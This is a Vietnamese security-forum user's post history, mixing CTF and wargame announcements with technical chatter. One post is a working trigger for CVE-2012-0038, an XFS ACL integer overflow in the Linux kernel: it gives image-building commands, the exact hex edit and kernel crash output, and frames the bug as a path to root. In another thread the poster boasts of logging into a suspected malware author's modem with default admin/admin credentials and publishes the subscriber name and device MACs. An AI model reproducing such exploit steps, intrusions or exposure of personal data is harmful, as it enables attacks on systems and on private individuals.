Messages posted by "cr4zyb0y"

ai biết về trình biên dịch GCC

cr4zyb0y — GMT

nó troll anh đó anh conmale ơi :|

HVA News - Deep Web ( Web Ẩn ) là gì

cr4zyb0y — GMT

idid231 wrote:

Vậy đối tượng hướng tới của Web Ẩn chỉ là những kẻ siêu tin học? Bởi có giỏi thì mới tìm thấy dạng web như vậy. Mà em cũng chưa hiểu loại web này phục vụ mục đích gì. Người quản trị thường muốn tăng rank cho site của mình, đằng này lại muốn Ẩn đi, chắc chỉ toàn mục đích đen tối. Các trang dạng "phải xác thực truy cập" không rõ là tiếp thị bằng cách nào để đem về nguồn thu nhỉ? Bởi em thấy porn thì nhiều trang bị crack acc lắm, bảo mật không cao thì khách chạy hết mất.

Mục tiêu của Web Ẩn* là Ẩn, còn về đối tượng thì không có giới hạn. Ai có nhu cầu thì sử dụng thôi. Không cần giỏi mới tìm thấy, chỉ cần biết thì vào thôi. Vì là ẩn danh trên mạng này, nên các website trong mạng ẩn này hầu hết là phục vụ các dịch vụ như bán hacked credit card, các thể loại giải trí khiêu dâm, các dịch vụ hack thuê, còn có cả dịch vụ viết paper, tìm tài liệu thuê nữa =)). * mình chỉ nói phần web ẩn hướng tới tính ẩn danh của người dùng, phần lớn còn lại là các web nội bộ của doanh nghiệp, chính phủ, tổ chức ... thì không vào được nên không đề cập ở đây.

Vietnamese Hacking Challenges

cr4zyb0y — GMT

Một challenge mới được ra mắt : http://wargame.vn/login.html Mời các bạn tiếp tục. Goodluck !

BkitSec Wargame

cr4zyb0y — GMT

từ trước đến giờ các bạn đã nghe XSS, vậy XSS là gì, chúng nguy hiểm như thế nào, và một khi một trang web nào đó bị lỗi XSS thì làm sao mà khai thác. tụi mình vừa ra một loạt các thử thách liên quan đến XSS ở : http://bkitsec.vn/?topic=web-level3-xsshuh liệu có thể kiếm soát trang web chỉ qua XSS, các bạn hãy thử xem. P/S : link trên sẽ hiện 404 nếu bạn chưa đăng nhập.

CVE-2012-0038: XFS ACL count integer overflow PoC

cr4zyb0y — GMT

Một lỗi bảo mật khá cơ bản được tìm ra trong mã nguồn của Linux kernel trong việc thao tác XFS file system. Trong linux/fs/xfs/xfs_acl.c : Code:

STATIC struct posix_acl *
xfs_acl_from_disk(struct xfs_acl *aclp)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
struct xfs_acl_entry *ace;
int count, i;

count = be32_to_cpu(aclp->acl_cnt);

acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);

for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
...
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
...
}
return acl;
...
}

Trong posix_acl_alloc chúng ta có: Code:

struct posix_acl *
posix_acl_alloc(int count, gfp_t flags)
{
const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);
struct posix_acl *acl = kmalloc(size, flags);
if (acl)
posix_acl_init(acl, count);
return acl;
}

Như vậy biến count được khai báo là kiểu Interger. Biến size được tính toán dựa trên : Code:

const size_t size = sizeof(struct posix_acl) +
count * sizeof(struct posix_acl_entry);

Vấn đề xảy ra khi count quá lớn, dẫn tới phép toán này gây ra tràn số, size sẽ < count. Lúc này bộ nhớ được cấp phát sẽ nhỏ hơn thực tế mà chương trình sử dụng ở: Code:

for (i = 0; i < count; i++) {
......

Tử đây một lỗi tràn bộ đệm sẽ xảy ra. Kết quả là kernel panic hoặc có thể dẫn tới thực thi mã ( code execution ) ở mức kernel. Nếu hệ thống có hỗ trợ automount XFS file system, khi chúng ta chuẩn bị một đĩa USB với định dạng XFS với các thông số và mã khai thác phù hợp sẽ dẫn tới lấy quyền root ( vì module này chạy với quyền của kernel) hoặc ít nhất có thể làm crash hệ thống đó. Mình thấy bug này khá thú vị và nhân tiện cũng muốn hướng dẫn các bạn cách viết exploit cho kernel driver ( nhưng cái như local root mà các bạn hay xài). Trước tiên chúng ta tạo ra 1 xfs file system chuẩn: Code:

[root@vulnBox xfs]# dd if=/dev/zero of=expl bs=1M count=40
40+0 records in
40+0 records out
41943040 bytes (42 MB) copied, 0.0600407 s, 699 MB/s
[root@vulnBox xfs]# mkfs.xfs expl
meta-data=expl                   isize=256    agcount=2, agsize=5120 blks
=                       sectsz=512   attr=2, projid32bit=0
data     =                       bsize=4096   blocks=10240, imaxpct=25
=                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0
log      =internal log           bsize=4096   blocks=1200, version=2
=                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0
[root@vulnBox xfs]#

Tiếp theo, mount nó ra và tạo 1 file rồi thay đổi ACL cho nó( vì phần bị lỗi ở xfs_acl): Code:

[root@vulnBox xfs]# mount expl /mnt/tm/
[root@vulnBox xfs]# echo "coolExploit" > /mnt/tm/hellosuto
[root@vulnBox xfs]# setfacl -m u:user:rw- /mnt/tm/hellosuto
[root@vulnBox xfs]# getfattr -e hex -dm '.*' /mnt/tm/hellosuto
getfattr: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
security.selinux=0x756e636f6e66696e65645f753a6f626a6563745f723a66696c655f743a733000
system.posix_acl_access=0x0200000001000600ffffffff02000600e803000004000400ffffffff10000600ffffffff20000400ffffffff
trusted.SGI_ACL_FILE=0x0000000500000001ffffffff0006000000000002000003e80006000000000004ffffffff0004000000000010ffffffff0006000000000020ffffffff00040000

[root@vulnBox xfs]# getfacl  /mnt/tm/hellosuto
getfacl: Removing leading '/' from absolute path names
# file: mnt/tm/hellosuto
# owner: root
# group: root
user::rw-
user:user:rw-
group::r--
mask::rw-
other::r--

Mở ra bằng 1 hex editor và thay đổi: Code:

0000DF60   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................................
0000DF80   00 00 00 00  00 40 0C 53  47 49 5F 41  43 4C 5F 46  49 4C 45 00  00 00 05 00  00 00 01 FF  FF FF FF 00  .....@.SGI_ACL_FILE.............

Từ : 49 4C 45 00 00 00 05 49 4C 45 40 00 00 00 để chuyển số lượng ACL entry từ 5 sang 0×40000000. Và : Code:

[ 4107.439000] BUG: unable to handle kernel paging request at ffffffff
[ 4107.439015] IP: [] __kmalloc+0x9d/0xff
[ 4107.439023] *pde = 00ffc067 *pte = 00000000
[ 4107.439023] Oops: 0000 [#1] SMP
[ 4107.439023] Modules linked in: xfs fcoe libfcoe 8021q garp stp llc lockd libfc scsi_transport_fc scsi_tgt ip6t_REJECT nf_conntrack_ipv6 nf_defrag_ipv6 nf_conntrack_ipv4 nf_defrag_ipv4 ip6table_filter xt_state ip6_tables nf_conntrack ppdev snd_intel8x0 snd_ac97_codec ac97_bus snd_seq snd_seq_device parport_pc snd_pcm snd_timer snd soundcore joydev i2c_piix4 microcode i2c_core parport e1000 snd_page_alloc sunrpc uinput [last unloaded: scsi_wait_scan]

Như vậy chúng ta đã có sample để trigger bug này, phần tiếp theo các bạn có thể theo dõi ở : http://bkitsec.vn .

BkitSec Wargame

cr4zyb0y — GMT

Hi các bạn, thử thách thứ 2 đã ra lò - một thử thách về web hacking. Các bạn có thể tìm hiểu thêm tại : [1st Chal] Targeted Attack level 1 http://bkitsec.vn/?topic=1st-chal-targeted-attack-level-1 [Web 1st]Let's Hack http://bkitsec.vn/?topic=web-1stlets-hack

BkitSec Wargame

cr4zyb0y — GMT

hi anh, các thông tin đó em thấy mọi quá trình đăng ký nào cũng yêu cầu, đâu phải là duy nhất tụi em đâu. vả lại, để đảm bảo chất lượng, đồng thời thể hiện sự nghiêm túc của các bạn muốn tham gia thì việc tự gửi một lá thư như vậy là cần thiết. thân !

BkitSec Wargame

cr4zyb0y — GMT

Chào các bạn, Làm thế nào để tận dụng lỗi phần mềm /hvaonline/posts/list/38052.html), hẳn các bạn đã từng đọc qua loạt bài dịch này của mod Ky0. Và các bạn cũng hình dung được trong đầu mình rằng : " à, khai thác lỗi phần mềm là thế đấy, thế đấy ...." . Nhưng vấn đề gặp phải ở hầu hết mọi người là môi trường thực nghiệm và chỗ trao đổi những vấn đề cụ thể trong quá trình các bạn tìm hiểu . Với mục đích hỗ trợ, và tạo môi trường cho các bạn cũng chia sẻ, nghiên cứu và thực hành. Tụi mình, nhóm BkitSec http://bkitsec.vn), đã quyết định tạo một diễn đàn nhỏ http://bkitsec.vn/?post_type=forum). Ở diễn đàn này, hằng tuần sẽ có các "thử thách" ra lò dưới dạng wargame để các bạn có thể luyện tập. Trong khi đó vẫn có thể trao đổi và học hỏi kinh nghiệm qua diễn đàn. Các "thử thách" sẽ đủ các chủng loại :

Tận dụng lỗi phần mềm (thường thấy nhất, là các ứng dụng chạy trên các hệ điều hành dòng *nix, windows ) Khai thác lỗi từ ứng dụng web Mã hóa Malware analysis ...

Và với sự hỗ trợ từ các đàn anh từ nhóm VNsecurity http://vnsecurity.net), tụi mình hi vọng sẽ tạo ra một sân chơi bổ ích cho các bạn hackers. P/S : Các kiến thức cơ bản và nền tảng về KHMT , các bạn vẫn có thể trao đổi ở diễn đàn, tụi mình rất vui khi được chia sẽ cùng các bạn. Cảm ơn mọi người.

PullThePlug wargame

cr4zyb0y — GMT

vì người chơi trước nghĩ cho người chơi sau, và để game luôn luôn mới ;-)

PullThePlug wargame

cr4zyb0y — GMT

có một luật ngầm của giới chơi wargame loại này là không bao giờ viết ra lời giải, hoặc để thông tin mật khẩu ra như bạn

Thư viện Source vì Cộng đồng trên Hvaonline

cr4zyb0y — GMT

quangteospk wrote:

Cá nhân mình cũng thấy điều này là không cần thiết. Tài liệu bạn search GG ra rất là nhiều, mọi người có thể dễ dàng làm điều này. Hơn nưa một số tài liệu của NhatNghe, VnPro, SaigonCTT thì cũng có "bản quyền" của họ, mà chính forum của họ cũng có share rồi. Còn nói về sách, trong HVA cũng có topic chia sẻ ebook tiếng Anh của một bạn nào đó rồi. Ai cần vô đó tìm kiếm thêm. Hơn nữa cái khẩu hiệu hô hào của bạn nghe rất "buồn cười". Bởi sách, tài liệu không phải là đồ chùa. Bạn có thể down ở một nguồn free nào đó, đọc nó, phục vụ cho mục đích của cá nhân bạn. Chứ đừng đem những thứ "chùa", "lậu" ra mà hô hào vì một tinh thần chia sẻ. Cá nhân mình thấy việc tìm kiếm tài liệu cũng "lòi" ra một số điểm hay ho. Việc một người học IT mà ko biết search GG là mệt rồi :D Vài dòng tâm sự.

Chào bạn, thay vì chỉ ra điểm dở, thì sao lại không góp ý để loại bỏ những điểm dở đó nhỉ. Và cũng qua ý kiến của bạn, mình không thấy bạn có chút suy nghĩ nào cả. Đồng ý là tài liệu thì rất nhiều, tuy nhiên vấn đề tổng hợp và chọn lọc thì không phải ai cũng làm được. Và cái quan trọng hơn, là những tài liệu hay, đã được bạn đọc và chiêm nghiệm chẳng hạn, bạn giới thiệu lại cho những người khác thì phần giá trị của tài liệu ấy còn cao hơn nữa. Nói về vấn đề bản quyền thì cũng có rất nhiều cách giải quyết khác nhau : Thứ nhất, có rất nhiều tài liệu miễn phí và rất hay, rất cần được chia sẻ. Thứ hai, hệ thống chia sẻ này sẽ không chấp nhận "lưu trữ" bất kì tài liệu bản quyền nào, bạn có thể viết giới thiệu và cung cấp đường dẫn đến tài liệu. Và vì là do đóng góp của cộng đồng, trách nhiệm thuộc về mỗi thành viên chứ không phải là của hệ thống. Mình nghĩ cái hay nếu có hệ thống này, và hệ thống này hoạt động tốt, là ở chỗ nó phân loại và chuyên môn hóa được các tài liệu.

Xin xem xét dùm bảo mật site rongchaua.net

cr4zyb0y — GMT

chẹp, ai viết cái proxy.php ghia vậy trời. rm proxy.php

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

bọn STL cũng ghê gớm nhỉ, đánh giằng mặt cơ đấy :))

Gentoo vs Ubuntu, Fedora,....

cr4zyb0y — GMT

cài thèn gentoo ở máy nào xong thì nhớ backup mấy cái config lại cất, để nhỡ có bề gì cài lại thì chứ copy vô mà quất thôi. gentoo để mà chạy được (without GUI) thì cài có tí chứ mấy, mà thêm em X11 + gnome/kde/... thì khổ vl ra. và vấn đề quay ngược lại là phải đi tìm hiểu mấy cái phần cứng mouse/keyboard/GPU linh tinh để cài cho đúng. nhiều bác nản là nản chỗ này thôi. mà trên gentoo wiki, nó cũng có nhiều bài viết hướng dẫn chi tiết cho từng dòng máy một, giảm bớt cho ta phần nào công sức .

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

exception wrote:

Nói đi nói lại, thực ra STL là người của ai thì mọi người cũng lờ mờ đoán ra rồi. Nhưng chẳng lẽ một nhóm được đầu tư tiền bạc, thời gian như thế mà lại làm ra các sản phẩm "gà mờ" như thế sao (qua các bài phân tích của anh TQN)? Có lẽ tiền của người đầu tư rơi nhầm chỗ rồi thì phải :lolz Nhưng thôi, quay lại chủ đề kỹ thuật, anh TQN cho em xin ít mẫu xem nào. Sẵn tiện đang free không có gì phải làm đây.

bác đoán là ai vậy, em thì chịu. còn chiện vung tiền, đầu tư nhìu mà sản phẩm gà mờ như bác nói thì ngoài đường thiếu gì, hay là bác hiện không ở VN :-?

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

mv1098 wrote:

TQN wrote:

Cảm ơn anh conmale đã lên tiếng. Bà con đừng hùa nhau vào chửi rũa tohoangvu. Biết đâu chính tohoangvu cũng là nạn nhân của STL hay ai khác thì sao. Cái thằng giấu mặt là thằng này nè: 123.21.140.237
TQN không hiểu vấn đề hay là vờ không hiểu để chọc mình :( cái ip 192.168.x.x là cái ip modem cấp cho các máy client cắm vào nó ( ip LAN ), còn cái ip 123.21.140.237 là do ISP cấp cho modem của khách hàng khi kết nối vào internet ( ip WAN ) Mà các thuê bao ADSL thường là IP động chứ không phải ip tĩnh nên khi reset modem thì ISP sẽ cũng cấp 1 ip mới chứ không phải ip cũ nữa. Bác truy cập vào trang http://checkmyip.com/ xem ip của mình là gì, sau đó reset modem, clear cache của trình duyệt rồi vào lại trang đó bác sẽ thấy ip thay đổi ps: lúc đầu bác vào check port có để ý nó là modem Zoom X5 không, giờ nó là modem TP-Link khác hoàn toàn, không lẽ anh ta thay luôn cả modem

không đọc những gì mình viết trên kia à, mình có nói rỏ ràng 2 giả thiết nếu ip 123.21.140.237 đã/chưa assign cho thèn khác thì tình huống sẽ khác mà. còn vi phạm pháp luật mẹ gì mình không care, vì mấy anh công an mạng chả quan tâm gì tới mấy cái mình làm đâu =)) , nếu có thì đập tụi STL có ích hơn. tội phát tán malware là đi tù như chơi ấy chứ nhỉ =))

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

TQN wrote:

Hì hì, vậy là cái modem của cậu ngokiennam này đặt default pasword rồi, phải không cr4zyb0y ? Còn cái tên wujianan này nữa, đặc sệt tàu khựa !

default anh, em đổi nó rồi, nếu ai cần thì pri message cho mình. nếu giả thiết của em về ip đó đã assign cho 1 user khác, không phải của tụi STL thì cũng không có gì khai thác, ngược lại thì chém thôi ;))

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

và một điều nữa, có thể ip 123.21.140.237 đã được assign cho 1 user khác của vnpt . tuy nhiên, có 1 cặp ip + time thì hiển nhiên công an nếu muốn túm thèn STL đó thì cũng không phải là điều gì quá khó khăn.

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

chủ thuê bao vnpt của ip 123.21.140.237 là ngokiennam / megavnn1

Device Information Firmware Version : 1.0.2 Build 080513 Rel.58514 MAC Address : 00:23:cd:c8:95:50

lúc mình vào thì có 1 cái máy đang sài là

wujianan-PC 192.168.1.100 00-24-1D-88-E4-79

còn đây là hai cái video : http://www.mediafire.com/?znh340c70id3jac còn tohoangvu có bị mất mail không thì không biết. vì mình sms với ảnh thì ảnh nói là "are you hacker my email", nhưng mình hỏi là email nào thì ảnh lại lờ đi ...

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

cái ip 123.21.140.237 admin/admin dô đc mà ta

RCE và vô hiệu hoá VB.NET virus (của STL à ?)

cr4zyb0y — GMT

lão tohoangvu này gần nhà mình ở QN, để khi nào về offline sinh tử lệnh tám chơi. xx

Liệu Instant Messenger có đáng tin cậy?

cr4zyb0y — GMT

Nhận xét trên chỉ nói đến vấn đề lưu mật khẩu của IM client thôi mà, đâu có nhắc gì đến chuyện IM hay bất cứ giao thức dùng trong IM đâu.

Hỏi cách post 1 bải lên 1 diễn vBulletin bằng Python

cr4zyb0y — GMT

đoạn trên là đoạn xử lý login, còn đoạn post bài đâu :-? còn nếu muốn auto post bài thì thay vì làm các bước login này nọ, bạn dùng cái này http://docs.python.org/library/cookielib.html nữa.

Bạn thử để trống vb_login_md5password và vb_login_md5password_utf (hoặc bỏ hẳn, không định nghĩa hai trường đó trong dict luôn), ngoài ra điền username và password (chưa mã hóa) của bạn vào vb_login_username và vb_login_password xem sao.

vbb nó có cái javascript md5 cái pass rồi mới gửi lên server xử lý tiếp đó anh iu ^^ .

RCE đám virus của Sinh Tử Lệnh.

cr4zyb0y — GMT

cái log của yahoo nó có lưu IP luôn đó anh TQN, anh post lên luôn đi .

Có nên dùng BKAV?

cr4zyb0y — GMT

Comodo Internet Security Pro , free 1 năm mà. Tích hợp antivirus, firewall ... rất hay :D

Những cuốn sách bạn đang đọc ?

cr4zyb0y — GMT

Có 4 nguyên tắc cơ bản : bảo mật, toàn vẹn, sẵn dụng và xác thực . bạn Ar0 có thể tham khảo thêm tại http://en.wikipedia.org/wiki/Information_security

From Patch to Proof-of-Concept: MS10-081

cr4zyb0y — GMT

Tham khảo thêm : - SyScan'10 Ho Chi Minh: KICKING THE VULNERABILITIES OUT OF MICROSOFT PATCHES ( http://www.youtube.com/watch?v=YpqjfKUpQIM ) - Slides ( http://www.mediafire.com/?vpttn658xs57gdr ) - 0ne-day exploit

side-channel attacks

cr4zyb0y — GMT

abc http://crazyboy.bshellz.net/cgi-bin/checkpass.py game đã trở lại, anh em thích thì chiến nha :))

Sir Alex Conmale và thế hệ vàng

cr4zyb0y — GMT

thành thật mà nói, cái mà được gọi là tư duy của kimchinh_no1 là thứ mà cần phải được rèn luyện, trao dồi. Và tuỳ cơ địa mỗi người, mỗi hoàn cảnh mà người ta có cách suy nghĩ, tư duy riêng. Kinh nghiệm có thể truyền đạt, nhưng tư duy thì mình nghĩ là không. thử hỏi (anh conmale chẳng hạn) lúc trước, khi anh ấy bắt đầu, anh ấy đã cố gắng như thế nào, rèn luyện như thế nào, anh ấy có ai chỉ, ai bảo về tư duy không mà anh ấy vẫn thành công ? Đời này ngắn lắm, hết 1/3 rồi mà còn ngồi đây đi tìm hướng tư duy này nọ thì bao giờ mới sống thực sự. sao không thử lăng xả, sống hết mình thử xem, đừng có quan tâm gì hết, chỉ sống, học tập và làm việc hết mình, và vui là được.

side-channel attacks

cr4zyb0y — GMT

qua tết chơi tiếp !